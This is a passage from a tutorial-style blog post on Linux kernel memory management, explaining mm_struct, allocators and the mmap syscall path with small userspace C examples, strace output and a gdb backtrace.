<li>The <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779"><code>struct mm_struct</code></a> provides a description of a process&rsquo; virtual address space, including its different areas of virtual memory (<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664"><code>struct vm_area_struct</code></a>).</li>
<li>The <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779"><code>mm_struct</code></a> also includes a pointer to the uppermost table (<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L806"><code>pgd_t * pgd</code></a>) which is used to map our process&rsquo; virtual addresses to a specific page in physical memory.</li>
</ul>
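<p>To make these structures a little more tangible, here&rsquo;s a minimal userspace sketch (not kernel code) that reads <code>/proc/self/maps</code>. Roughly speaking, each line the kernel prints there describes one area of the process&rsquo; virtual address space, i.e. one <code>vm_area_struct</code> hanging off our <code>mm_struct</code>. The helper name <code>count_vmas()</code> is my own, purely for illustration:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

/*
 * Count the mappings listed in /proc/self/maps, optionally printing them.
 * Hypothetical helper for illustration; returns -1 if the file can't be read.
 */
static int count_vmas(int print)
{
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512];
    int count = 0;

    if (!f)
        return -1;

    while (fgets(line, sizeof(line), f)) {
        if (print)
            fputs(line, stdout);
        /* Only count complete lines, in case a long path was split up. */
        if (strchr(line, '\n'))
            count++;
    }

    fclose(f);
    return count;
}

int main(void)
{
    int n = count_vmas(1);

    if (n &lt; 0) {
        perror("fopen");
        return 1;
    }
    printf("%d mappings in our address space\n", n);
    return 0;
}
</code></pre></div><p>Each line shows the address range, permissions, offset and backing file (if any) of a mapping, which lines up nicely with the kind of information the kernel needs to track per area.</p>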
<h3 id="allocating-memory">Allocating Memory</h3>
<p>With our memory represented, we need a way to actually make use of it! The various allocation mechanisms fall under the memory management subsystem, providing ways to manage the pool of available physical memory and allocate it to be used. This includes:</p>
<ul>
<li>The page allocator (<a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/page_alloc.c"><code>mm/page_alloc.c</code></a>) for allocating physically contiguous memory of at least <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_types.h#L11"><code>PAGE_SIZE</code></a>.</li>
<li>The slab allocator for the efficient allocation of (physically contiguous) objects, via the <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687"><code>kmalloc()</code></a> API. <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab.h"><code>mm/slab.h</code></a> and <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab_common.c"><code>mm/slab_common.c</code></a> define the common API, while the SLUB implementation can be found at <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/slub.c"><code>mm/slub.c</code></a>.</li>
<li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c"><code>mm/vmalloc.c</code></a> provides an alternative API for allocating <em><strong>virtually</strong></em> contiguous memory and is used for large allocations that may be hard to find physically contiguous space for. E.g. <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L817"><code>kvmalloc()</code></a> will <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687"><code>kmalloc()</code></a> but use <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144"><code>vmalloc()</code></a> as a fallback!</li>
</ul>
<h3 id="mapping-memory">Mapping Memory</h3>
<p>So far we&rsquo;ve touched mainly on how to manage physical memory, but as we know there&rsquo;s a lot more to it than that! Sure, we can map chunks of physical memory into our virtual address space to work on, but what about stuff that sits on disk?</p>
<ul>
<li><a href="https://man7.org/linux/man-pages/man2/mmap.2.html"><code>mmap(2)</code></a> (<a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1521"><code>mm/mmap.c</code></a>) is a one-stop shop for userspace mappings and allows us to map physical memory into our process&rsquo; virtual address space so we can access it. This can be anonymous memory (i.e. just a chunk of physical memory for us to use) or it can be used to map a previously opened file into memory too!</li>
<li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/filemap.c"><code>mm/filemap.c</code></a> contains some core, generic functionality for managing file mappings, including the use of a page cache for file data. This can then be utilised by file systems when they <a href="https://man7.org/linux/man-pages/man2/read.2.html"><code>read(2)</code></a> or <a href="https://man7.org/linux/man-pages/man2/write.2.html"><code>write(2)</code></a> files for example.</li>
<li>The <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322"><code>ioremap()</code></a> API is used for mapping device memory into the kernel virtual address space. An example would be a GPU kernel driver mapping some GPU memory into the kernel virtual address space so it can access it. If you recall the <a href="https://sam4k.com/linternals-virtual-memory-part-3/#kernel-virtual-memory-map">post on the kernel virtual address space</a>, you&rsquo;ll see that the kernel memory map has a specific region for <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322"><code>ioremap()</code></a>/<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144"><code>vmalloc()</code></a>&rsquo;d memory! And why do they share a region? Because under the hood <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322"><code>ioremap()</code></a> uses the <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404"><code>vmap()</code></a> API&hellip;</li>
<li>The <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404"><code>vmap()</code></a> API allows the kernel to map a set of physical pages to a range of contiguous virtual addresses (within the vmalloc/ioremap space). As we&rsquo;ve mentioned, this is used by both <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144"><code>vmalloc()</code></a> and <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322"><code>ioremap()</code></a>. As a result you can find some functionality for all of them in <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c"><code>mm/vmalloc.c</code></a>.</li>
</ul>
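<p>As a quick userspace illustration of the file-backed case, here&rsquo;s a minimal sketch that writes a short message to a temporary file and then reads it back through a private, read-only mapping rather than <code>read(2)</code>. The function name <code>file_mapping_demo()</code> and the use of <code>tmpfile()</code> are my own choices for the example:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/mman.h&gt;

/*
 * Write a message to a temporary file, map the file and compare what we see
 * through the mapping. Hypothetical helper: returns 0 on success, -1 on error.
 */
static int file_mapping_demo(void)
{
    const char msg[] = "hello from a file mapping";
    FILE *f = tmpfile();
    char *p;
    int match;

    if (!f)
        return -1;

    /* Make sure the data has actually left stdio&#39;s buffer before mapping. */
    if (fwrite(msg, 1, sizeof(msg), f) != sizeof(msg) || fflush(f) != 0) {
        fclose(f);
        return -1;
    }

    /* No MAP_ANONYMOUS this time: we pass a real fd and a file offset of 0. */
    p = mmap(NULL, sizeof(msg), PROT_READ, MAP_PRIVATE, fileno(f), 0);
    if (p == MAP_FAILED) {
        fclose(f);
        return -1;
    }

    match = memcmp(p, msg, sizeof(msg)) == 0;

    munmap(p, sizeof(msg));
    fclose(f);
    return match ? 0 : -1;
}

int main(void)
{
    if (file_mapping_demo() != 0) {
        fprintf(stderr, "file mapping demo failed\n");
        return 1;
    }
    puts("read the file contents back via mmap()");
    return 0;
}
</code></pre></div>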
<h3 id="managing-memory">Managing Memory</h3>
<p>We&rsquo;ve talked a lot about the building blocks for managing memory, but what about actual high level management of memory? Well there&rsquo;s plenty of that too!</p>
<ul>
<li>There are a number of syscalls found in <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm"><code>mm/</code></a> related to memory management: <a href="https://man7.org/linux/man-pages/man2/mmap.2.html"><code>mmap(2)</code></a> and <a href="https://man7.org/linux/man-pages/man2/mmap.2.html"><code>munmap(2)</code></a> for managing mappings, <a href="https://man7.org/linux/man-pages/man2/mprotect.2.html"><code>mprotect(2)</code></a> for managing access protections of mappings, <a href="https://man7.org/linux/man-pages/man2/madvise.2.html"><code>madvise(2)</code></a> for giving the kernel advice on how to handle mapped pages, <a href="https://man7.org/linux/man-pages/man2/mlock.2.html"><code>mlock(2)</code></a> and <a href="https://man7.org/linux/man-pages/man2/mlock.2.html"><code>munlock(2)</code></a> to un/lock memory in RAM etc.</li>
<li>We also have other key management functionality such as how to handle when the system runs out of memory (<a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/oom_kill.c"><code>mm/oom_kill.c</code></a>) and the memory control groups (memcgs, <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/memcontrol.c"><code>mm/memcontrol.c</code></a>) which provide a way to manage the resources available to specific groups of processes.</li>
<li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/swapfile.c"><code>mm/swapfile.c</code></a> allows us to allocate &ldquo;swap&rdquo; files. This allows the kernel to use a portion of disk space (the swap file) as an extension of physical memory. When physical memory availability is low, the kernel will &ldquo;swap&rdquo; out inactive/old pages of physical memory to the swap file in order to free up physical memory.</li>
</ul>
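<p>To give a feel for a few of these syscalls from the userspace side, here&rsquo;s a small sketch that pokes at a single anonymous page with <code>mlock(2)</code>, <code>madvise(2)</code> and <code>mprotect(2)</code>. The function name <code>manage_memory_demo()</code> is made up for the example, and it leans on the Linux behaviour that <code>MADV_DONTNEED</code> on a private anonymous mapping means the next access sees a fresh zero-filled page:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;unistd.h&gt;

/*
 * Exercise a few memory management syscalls on one anonymous page.
 * Hypothetical helper: returns 0 if everything behaved as expected.
 */
static int manage_memory_demo(void)
{
    long page = sysconf(_SC_PAGESIZE);
    char *p;
    int zeroed;

    if (page &lt;= 0)
        return -1;

    p = mmap(NULL, page, PROT_READ | PROT_WRITE,
             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;

    p[0] = &#39;A&#39;;

    /* Pin the page in RAM, then unpin it. This can fail if RLIMIT_MEMLOCK
     * is very low, so we treat a failure here as non-fatal. */
    if (mlock(p, page) == 0)
        munlock(p, page);

    /* Tell the kernel we no longer need the contents of this page. */
    if (madvise(p, page, MADV_DONTNEED) != 0) {
        munmap(p, page);
        return -1;
    }
    zeroed = (p[0] == 0); /* our &#39;A&#39; should be gone */

    /* Drop write permission; a write after this point would SIGSEGV. */
    if (mprotect(p, page, PROT_READ) != 0) {
        munmap(p, page);
        return -1;
    }

    munmap(p, page);
    return zeroed ? 0 : -1;
}

int main(void)
{
    if (manage_memory_demo() != 0) {
        fprintf(stderr, "something didn&#39;t behave as expected\n");
        return 1;
    }
    puts("mlock/madvise/mprotect all behaved as expected");
    return 0;
}
</code></pre></div>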
<h2 id="getting-lost-in-the-source">Getting Lost in The Source</h2>
<p><img src="https://sam4k.com/content/images/2024/12/going_on_an_adventure.gif" alt=""></p>
<p>Alright, here&rsquo;s the plan: we will begin our journey with a simple C program that maps some anonymous memory, writes to it and then unmaps it. Sounds easy enough right?</p>
<p>To refresh, &ldquo;mapping&rdquo; memory essentially involves pointing some portion of our process&rsquo; virtual address space to somewhere in physical memory. This could be a file read into physical memory, but we can also map &ldquo;anonymous&rdquo; memory. This is just physical memory that has been allocated specifically for this mapping and wasn&rsquo;t previously tied to a file. But we&rsquo;ll get into that more shortly; for now, here&rsquo;s the code:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">void</span> <span class="o">*</span><span class="n">addr</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">addr</span> <span class="o">=</span> <span class="nf">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="p">(</span><span class="kt">long</span><span class="o">*</span><span class="p">)</span><span class="n">addr</span> <span class="o">=</span> <span class="mh">0x4142434445464748</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">munmap</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>So what&rsquo;s going on here? We map <code>0x1000</code> bytes (i.e. a page) of anonymous memory into our virtual address space, pointed to by <code>addr</code>. We then write 8 bytes, <code>0x4142434445464748</code>, to that address (which points to a page in physical memory). With our work done, we then unmap the anonymous memory and exit.</p>
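<p>The program above skips error handling to keep things short. If you want to play around with it yourself, a slightly more defensive sketch might look like the following. Note that <code>mmap()</code> signals failure with <code>MAP_FAILED</code> rather than <code>NULL</code>; the helper name <code>map_write_unmap()</code> is just something I&rsquo;ve picked for illustration:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;

/*
 * Same map/write/unmap sequence as before, but with return values checked.
 * Hypothetical helper: returns 0 on success, -1 on failure.
 */
static int map_write_unmap(void)
{
    void *addr;
    long readback;

    addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    if (addr == MAP_FAILED) { /* note: not NULL! */
        perror("mmap");
        return -1;
    }

    *(long *)addr = 0x4142434445464748;
    readback = *(long *)addr; /* read it back to check the write landed */

    if (munmap(addr, 0x1000) != 0) {
        perror("munmap");
        return -1;
    }

    return readback == 0x4142434445464748 ? 0 : -1;
}

int main(void)
{
    return map_write_unmap() == 0 ? 0 : 1;
}
</code></pre></div>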
<p>Okay, now we understand what the program is doing from a user&rsquo;s perspective - we&rsquo;re just writing some bytes to some physical memory we allocated. But what&rsquo;s the kernel actually doing under the hood? The primary API between userspace and the kernel is system calls, so we can use <a href="https://man7.org/linux/man-pages/man1/strace.1.html"><code>strace</code></a> to understand how our little program interacts with the kernel. Perhaps unsurprisingly, it&rsquo;s not too dissimilar:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&gt; strace ./mm_example
</span></span><span class="line"><span class="cl">// snip (process setup)
</span></span><span class="line"><span class="cl">mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f487ed24000
</span></span><span class="line"><span class="cl">munmap(0x7f487ed24000, 4096)            = 0
</span></span><span class="line"><span class="cl">exit_group(0)
</span></span><span class="line"><span class="cl">+++ exited with 0 +++
</span></span></code></pre></div><p>The libc <code>mmap()</code> and <code>munmap()</code> calls are just wrappers around the respective system calls, which we can see here. The only part of the program that doesn&rsquo;t use system calls is when we write to the memory, but as we&rsquo;ll soon see, that doesn&rsquo;t mean the kernel isn&rsquo;t involved!</p>
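<p>One way to get a glimpse of that hidden kernel involvement from userspace is to watch our process&rsquo; page fault counter around the first write. The sketch below uses <code>getrusage(2)</code> and its <code>ru_minflt</code> field (minor faults) for this. It assumes the page isn&rsquo;t populated until it&rsquo;s first touched, which is the usual behaviour for a mapping like ours, and the helper names are my own:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;sys/resource.h&gt;

/* Minor page faults taken by this process so far, or -1 on error. */
static long minor_faults(void)
{
    struct rusage ru;

    if (getrusage(RUSAGE_SELF, &amp;ru) != 0)
        return -1;
    return ru.ru_minflt;
}

/*
 * Map a fresh anonymous page and report how many minor faults the first
 * write to it caused. Hypothetical helper: returns -1 on error.
 */
static long faults_on_first_touch(void)
{
    long before, after;
    char *p;

    p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
             MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    if (p == MAP_FAILED)
        return -1;

    before = minor_faults();
    *(volatile char *)p = 1; /* no syscall here, just a plain store */
    after = minor_faults();

    munmap(p, 0x1000);

    if (before &lt; 0 || after &lt; 0)
        return -1;
    return after - before;
}

int main(void)
{
    printf("minor faults caused by first write: %ld\n",
           faults_on_first_touch());
    return 0;
}
</code></pre></div><p>On a typical setup this should report at least one fault: no system call was made, but the kernel still had to step in to back our page with physical memory.</p>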
<h2 id="mapping-memory-1">Mapping Memory</h2>
<p><img src="https://sam4k.com/content/images/2024/12/kermit_map.gif" alt=""></p>
<p>So let&rsquo;s start our dive into the kernel by seeing how memory is mapped.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">mmap</span><span class="p">(</span><span class="kt">void</span> <span class="n">addr</span><span class="p">[.</span><span class="n">length</span><span class="p">],</span> <span class="kt">size_t</span> <span class="n">length</span><span class="p">,</span> <span class="kt">int</span> <span class="n">prot</span><span class="p">,</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">                  <span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">off_t</span> <span class="n">offset</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">munmap</span><span class="p">(</span><span class="kt">void</span> <span class="n">addr</span><span class="p">[.</span><span class="n">length</span><span class="p">],</span> <span class="kt">size_t</span> <span class="n">length</span><span class="p">);</span>
</span></span></code></pre></div><p><a href="https://man7.org/linux/man-pages/man2/mmap.2.html"><code>mmap(2)</code></a> is the system call which &ldquo;creates a new mapping in the virtual address space of the calling process&rdquo;; for usage information check out the man page.</p>
<p>In our case we&rsquo;re creating a mapping of <code>0x1000</code> bytes, AKA <code>PAGE_SIZE</code>. We want to be able to read and write to it, so have specified the <code>PROT_READ | PROT_WRITE</code> protection flags. As we touched on before, we&rsquo;re not mapping a file or anything, so we specify <code>MAP_ANONYMOUS</code> - we just want to map a page of unused physical memory.</p>
<p>We also specify <code>MAP_PRIVATE</code>, which in the context of an anonymous mapping means that this mapping won&rsquo;t be shared with other processes, for example if we fork a child process. More broadly speaking it means &ldquo;Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file.&rdquo; <a href="https://man7.org/linux/man-pages/man2/mmap.2.html">[1]</a>.</p>
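<p>To see the difference this flag makes, here&rsquo;s a small sketch that forks a child which writes to an anonymous mapping, then checks what the parent sees afterwards. With <code>MAP_PRIVATE</code> the child&rsquo;s write stays in the child; swapping in <code>MAP_SHARED</code> makes it visible to the parent. The helper name <code>value_after_child_write()</code> is hypothetical, purely for this example:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;

/*
 * Parent writes 1 to an anonymous mapping, a forked child writes 2, and we
 * return what the parent reads afterwards (or -1 on error).
 * share_flag should be MAP_PRIVATE or MAP_SHARED.
 */
static int value_after_child_write(int share_flag)
{
    pid_t pid;
    int seen;
    int *p;

    p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
             MAP_ANONYMOUS | share_flag, -1, 0);
    if (p == MAP_FAILED)
        return -1;

    *p = 1;

    pid = fork();
    if (pid &lt; 0) {
        munmap(p, 0x1000);
        return -1;
    }
    if (pid == 0) {
        *p = 2;   /* the child&#39;s write */
        _exit(0); /* skip atexit handlers and stdio flushing */
    }

    if (waitpid(pid, NULL, 0) &lt; 0) {
        munmap(p, 0x1000);
        return -1;
    }

    seen = *p;
    munmap(p, 0x1000);
    return seen;
}

int main(void)
{
    printf("MAP_PRIVATE: parent sees %d\n",
           value_after_child_write(MAP_PRIVATE));
    printf("MAP_SHARED:  parent sees %d\n",
           value_after_child_write(MAP_SHARED));
    return 0;
}
</code></pre></div><p>The parent should still see <code>1</code> in the private case and <code>2</code> in the shared case.</p>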
<p>Finally, because it&rsquo;s an anonymous mapping, the file descriptor and offset arguments are ignored: there&rsquo;s no file to map, let alone a specific offset within one to map from. Some implementations require the <code>fd</code> to be -1 though, so that&rsquo;s why we set it.</p>
<h3 id="entering-the-kernel">Entering The Kernel</h3>
<p>Okay, so we understand the system call from a userspace perspective, but how do we go about understanding how it&rsquo;s implemented? Well, without going into detail on how system calls work, we can generally find a system call&rsquo;s &ldquo;entry point&rdquo; in the kernel by grepping the source for <code>SYSCALL_DEFINE.*&lt;syscall name&gt;</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="nf">SYSCALL_DEFINE6</span><span class="p">(</span><span class="n">mmap</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">off</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">off</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">PAGE_MASK</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">ksys_mmap_pgoff</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="n">off</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">arch/x86/kernel/sys_x86_64.c</a> (v6.11.5)</p>
<p>Check out the macros over in <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/syscalls.h"><code>include/linux/syscalls.h</code></a> if you&rsquo;re curious; this will also explain how to figure out the actual symbol for kernel debugging (spoiler: it&rsquo;s <code>__x64_sys_&lt;name&gt;</code> in our case).</p>
<p>That said, <a href="https://man7.org/linux/man-pages/man2/mmap.2.html"><code>mmap(2)</code></a> was a terrible example for this little auditing tidbit as there are actually a lot of results for <code>SYSCALL_DEFINE.*mmap</code>. This is due to architecture specific implementations and legacy versions. If you want to be extra sure, you can compare the arguments and architecture, or even whip out a debugger and break further in (e.g. on <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255"><code>do_mmap()</code></a>) [2] and check the back trace:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) bt
</span></span><span class="line"><span class="cl">#0  do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, flags=flags@entry=34, 
</span></span><span class="line"><span class="cl">    pgoff=pgoff@entry=0, populate=0xffffc900004f7d08, uf=0xffffc900004f7d28) at mm/mmap.c:1408
</span></span><span class="line"><span class="cl">#1  0xffffffff81890ae1 in vm_mmap_pgoff (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, 
</span></span><span class="line"><span class="cl">    flag=flag@entry=34, pgoff=pgoff@entry=0) at mm/util.c:551
</span></span><span class="line"><span class="cl">#2  0xffffffff819139db in ksys_mmap_pgoff (addr=&lt;optimized out&gt;, len=8192, prot=prot@entry=3, flags=34, fd=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    pgoff=&lt;optimized out&gt;) at mm/mmap.c:1624
</span></span><span class="line"><span class="cl">#3  0xffffffff810beff6 in __do_sys_mmap (addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=3, flags=&lt;optimized out&gt;, fd=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    off=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:93
</span></span><span class="line"><span class="cl">#4  __se_sys_mmap (addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=3, flags=&lt;optimized out&gt;, fd=&lt;optimized out&gt;, off=&lt;optimized out&gt;)
</span></span><span class="line"><span class="cl">    at arch/x86/kernel/sys_x86_64.c:86
</span></span><span class="line"><span class="cl">#5  __x64_sys_mmap (regs=0xffffc900004f7f58) at arch/x86/kernel/sys_x86_64.c:86
</span></span><span class="line"><span class="cl">#6  0xffffffff81008c2e in x64_sys_call (regs=regs@entry=0xffffc900004f7f58, nr=&lt;optimized out&gt;)
</span></span><span class="line"><span class="cl">    at ./arch/x86/include/generated/asm/syscalls_64.h:10
</span></span><span class="line"><span class="cl">#7  0xffffffff83be17a6 in do_syscall_x64 (regs=0xffffc900004f7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:50
</span></span><span class="line"><span class="cl">#8  do_syscall_64 (regs=0xffffc900004f7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:80
</span></span><span class="line"><span class="cl">#9  0xffffffff83e00124 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:119
</span></span></code></pre></div><p>Backtrace from a 5.15 kernel using GDB</p>
<h3 id="x64sysmmap"><code>__x64_sys_mmap()</code></h3>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="nf">SYSCALL_DEFINE6</span><span class="p">(</span><span class="n">mmap</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">off</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">off</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">PAGE_MASK</span><span class="p">)</span> <span class="c1">// [0]
</span></span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">ksys_mmap_pgoff</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="n">off</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span> <span class="cm">/* [1] */</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">arch/x86/kernel/sys_x86_64.c</a> (v6.11.5)</p>
<p>Now we have a starting point, let&rsquo;s start exploring! <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79"><code>__x64_sys_mmap()</code></a> starts off validating the <code>off</code> argument, making sure it&rsquo;s page aligned (i.e. a multiple of <code>PAGE_SIZE</code>) [0] and then shifting it so that <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476"><code>ksys_mmap_pgoff()</code></a> gets the page offset (instead of the byte offset) [1].</p>
